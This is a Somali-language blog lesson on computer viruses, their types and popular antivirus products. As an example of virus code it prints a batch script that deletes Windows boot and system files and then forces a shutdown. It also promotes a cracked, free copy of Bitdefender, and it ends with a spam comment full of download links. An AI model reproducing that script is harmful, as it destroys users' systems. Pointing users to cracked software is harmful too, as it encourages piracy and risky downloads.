Tuesday, March 1, 2016

WAA MAXAY VIRUS SIDEE U XALINKARAA WAXYEELADIISA

Waa maxay virus ?


Virus waa barnaamij loo sameeyay in lagu wax yeeleeyo dadka internetka soo gala ee  macluumaadka isku dhaafsada , barnaamijkaas oo kaa tir tiraya ama qaribaya ama qarinayaba wixii computerkaaga kuugu jiray oo muhimka ahaa haday yihiin sawiro , qoraalo ,ama videos iyo wixii la mida . viurksaas waxaa mararka qaarkood uu keenaa in computerkaaga damo oo laga quusto ilaa la format gareeyo maahee , waxaa kaloo dhici karta in crash uu noqo computerkaaga oo wax barnaamij ah oo computerkaaga ku jira uusan kuu shaqayn.
Halkee ka Yimaadaa virusku ?
Virusku waxa uu ka yimaadaa dhanka internetka viruskaas oo la iskugu diro website yada tusaale ahaan adoo raadinaya macluumaad ama aqoon kororsi ayaad arkaysaa meel ay ku qoran tahayDownload garayso software kaan waa muhim , kadib software kii aad sidaas usoo dagsatay aad ku dhex furtay computerkaaga .
ana waxa kuu soo baxaya update adobe reader task barka dhanka hoose ee computerka kadibna aad update ku dhufatay . waxaa kaloo la iskugu diraa viruska dhanka inboxka hotmail ,Gmail iyo wixii la mid ah 

Qaybaha Virusku u kala qaybsamo 
aad uu u qaybo badan yahay virusku lkn waxaan ka soo qaadan doonaa ilaa 4 nooc oo viruska ah iyo wax yeeladiisa anagoo qaar kood ku dari doona sida loo xaliyo waxyeelada viruska .
1- Brontok :    Viruskaan waxuu qariyaa dhamaan faylashii kuugu jiray computerkaaga ama falaashkaaga viruskaas oo aad u faafa kuna  kala gudba internetka iyo USB yada la galiyay internetka .
Waxaa jia softwaro makra ay kugu dhacdo ciladaan oo kale oo ay kaa qarsoomaan faylashii ama barnaamijtii kuugu jirtay flashkaaga ama memory gaaga aad usoo ceshan lahayd .
Software kaan waxaa loo yaqaan Show hiden  sidaad usoo dhagsatid RIIX halkaan .
2- Xcopy:     Viruskaan waxa uu ku dhacaa qaybta partation ka ama Drives ka .Viruskaan oo ku dhex abuuraya gudaha dareve ka file yar oo ay ku qoran tahay Autorun kaas oo aadan furi karin folderka asagoo markaad ku dul dhufatid muuska ku dhahaya OPEN WITH… .
3- Trivial :  Viruskaan dhib wayn uma keenayo computerkaaga haduu  galo hal ama labo xabo . lkn waxa uu dhib leeyahay marka asagoo badan uu galo computerkaaga . dhib wayn makeeno sida Viruska loo yaqaan stupid .
4-Moderate :   Viruskaan waxa uu tir tiraa dhamaan faylasha kuugu jira Drive ka marka uu galo falashkaaga ama Memory gaaga ku dhahaya Reformatting ama  تهية Yacnii format garee  . waa sida viruska Disk killer ee Driveyada ku sameeya formatinka .
kaasna waxaad ku xalin kartaa haduu kaa galo computerkaaga waa in aad leedahay Back up ama نسخة إحتياطية .
Aad ayay u fara badan yihiin noocyada viruska iyo qaybihiisa anagon awoodin in aan halkaan idinkugu soo wada ban dhigno .
Yaa sameeya Viruska sa muxuu ka samaysan yahay ?
waxaa sameeya viruska Dadka ku takhasusay ama yaqaana cilmiga programming ka , wuxuu ka samaysan yahay virusku xarfo iyo nambaro lagu amrayo computerka in uu tirtiro wixii ku dhex jira ama qariyo faylasha ku dhex jira ama oo Crash ka dhigo wixii computerkaas ku jira .
Tusaale :
@ echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.iniattrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @ echo off msg * You Got Owned” shutdown -s -t7 -c ”Virus ayaa ku haleelay”
Iska ilaali xarfahaan waa virus . lkn maahan mid hada wax yeelo kuu keenaya ilaa aad Note pad ku past garaysid .
Sidee uga hor tagi karnaa Viruska ?
Waa su,aal muhim ah in la is waydiiyo maadaama aan baranay ama wax ka ogaanay virusku waxa uu yahay iyo dhibaatooyinkuu keeno , hadana waxaa muhim ah in aad ogaatid dhibaatooyinkaas sidaan uga hor tagi lahayn .
Barnaamijyada looga hor tago Viruska waxaa loo yaqaan Anti-virus ama Virus ka hor tage .
Waxaa jira Boqolaal shirkadood oo ka ganacsada Anti-virus yada qaarkoodna ayba sameeyaan Viruska .
hadaba waxaan balkaan idinku tusinayaa Shirkadaha ugu awooda badan sanadaan 2013 ee dunida la ga isticmaalo .
waxaan halkaaan ku soo bandhigaynaa 5 ta Anti-virus ee ugu awooda badan oo loogu isticmaal badan yahay dunida :
bitdefender waxaan dhihi karaa waa number 1 calaamaka oo dil waana Anti-viruska ugu awooda badan dunida looguna isticmaal badan yahay .
waxaa jira asagoo Crack ah oo bilaash aad ku helaysid mudo 3  ama 5 am 7 sano ah amaba ka badan  asagoo ah Bitdefender Antivirus  2013  .
waxa uu u qayb samaa Bitdefender Sedex qaybood oo kala ah :
nooca ugu wanaagsan ama la dhihi karo waa ugu fiican yahay waa kan ugu sareeya ee  Bitdefender total security
Ka soo Downlaod Garayso ahalkaan :
MUHIIM: Ku duubista iyo Activationka Softweerkan Bitdefender Total Security 2013 waxaa la socda VIDEO ee daawo si uu kuugu fududaado ku duubitsa. Website ka solagroups waa website somali ah oo macluumaad badan aad ka heli kartid lkn waxaa lagama maar maan ah iska diiwaan gali website ka Register  sanadkii dhan waa 12$ ku dhufo halkaan sidad iskaga diiwaan galisidSolagroups.com
2-   Kaspersky Anti-Virus 2013 
Labada kaalmood ee ugu horeeya dunida waxaa qaaday labada shirdood ee kala ah Bitdefender iyo Kaspersky waana labada shirkadood ee ugu haysta dunida  oo loogu isticmaal badan yahay .
Ka soo Download Garayso halkaan :
3-    ESET NOD32 Antivirus 6
waxa uu ka mid yahay anti-viruskaan Anti-virus yada ugu awooda badan in kastoo laga horeeyo . waxaad ka helaysaa asagoo bilaash ah webite yada hoose .
Ka soo Download Garayso halkaan :
Nod32 antivirus 7.0.28.0 beta
Ka soo Dagso halkaan noocyadiisa kala duwan free Downlaod

[ NOD32 6.0.316.0 – 32-bit ]

…………………………………………………………………….

[ NOD32 6.0.316.0 – 64-bit ]

…………………………………………………………………….

[ NOD32 Antivirus Updates ]

…………………………………………………………………….

[ NOD32 Antivirus 7.0.28.0 Beta – 32-bit ]

…………………………………………………………………….

[ NOD32 Antivirus 7.0.28.0 Beta – 64-bit ]

…………………………………………………………………….
4-    AVG Antivirus Professional 2013
AVG  waxa uu ka mid yahay Anti-virus yada ugu awooda badan waxa uuna kaa ilaalinayaa dhamaan noocyada kala duwan ee viruska waxaad jira cashar aan horay uga samaynay AVG Internet Security  . Halkaan Riix .
Ka soo Downlaod Garayso Halkaan :
A- Soo Downlaod gareyso 32 bit

http://www.avg.com/download-file-x86-triisc-huawei

B- Soo Downlaod garayso 64 bit

http://www.avg.com/download-file-x64-triisc-huawei

Macluumaad ku saabsan Avg Sidaad u ogaato Halkaan Gujji
5-    Avira Antivirus Premium 2013
Avira Antivirus waxaa uu ka mid yahay anti virus yada looga hor tago Viruska soo Hujuuma Computerkaaga kaas oo owdaya meelaha uu ka soo hujuuma xirayana albaabada uu ka soo galo .
Ka soo Download Garayso Halkaan :
Hadaad rabtid in aad wax ka ogaatid Macluumaad dheeri ah oo ku saabsan Viruska waxaan halkaan kusoo  diyaariyay link Website yada somaalida ee wax ka qoray Virus iyo wixii la halmaala 
2- Waa maxay waxayaabaha waxyeeleeya aaladaha Electronic ka ah .  waxaa ka soo xigtay Websiteka axmahaajir.wordpress.com sidaad u akhrisid waxa laga qoray Halkaan Riix sidaad u gashid 
3- Mooryaanta internetka  waxaa wax ka qoray Website ka caanka ah ee somalitalk.com 
4- Waa maxay firewall waxaa wax ka qoray ayadana websiteka barashada computerka eeAqoonkaal.net  ama Aqoonkaal.com waa isku mid Halkaan Riix sidaad u gashid  .
Hadaba waxaad barateen waxa uu yahay Virus hadaba ma ogatahay in uu jiro Viruska Dadka  dabcan way kala duwan yihiin Viruska dadka waa waxa loo yaqaan afka soomaaliga Jadeeco Aqoontaada kororso oo ogow waxa ay ku kala duwan yihiin sidaad u ogaatid  Halkaan Riix sidaad u gashid . 
HADABA AKHRISTE WAXA CASHARKAN KU SOO DIYAARIYAY ABDIKARIEM MAHAMOUD AHMED
WAANA CASHAR AAD U FAAIIDO BADAN KUWAN IYO KUWA KALEBA WAXAAD KAL SOCON DOONTAA WEBKEENAN DHIILOOD.BLOGSPOT.COM AMA CHANNELKA AAN KU LEEYAHAY YOUTUBE EE
                                            YOUTUBE CHANNEL ABDIKARIEM DHIILOOD JR
                                                                             AMA 
                                                     FACEBOOK PAGE DHIILOOD 2016
                                                           PLEASE LIKE AND SHARE
WIXII CASHARKA AH EE COMMENT AH KUSOO GUDBI HALKA HOOSE EE WEBKA MAHADSANIDIIN 

1 comment:

  1. Waa Maxay Virus Sidee U Xalinkaraa Waxyeeladiisa ~ Somali Computer Technology >>>>> Download Now

    >>>>> Download Full

    Waa Maxay Virus Sidee U Xalinkaraa Waxyeeladiisa ~ Somali Computer Technology >>>>> Download LINK

    >>>>> Download Now

    Waa Maxay Virus Sidee U Xalinkaraa Waxyeeladiisa ~ Somali Computer Technology >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete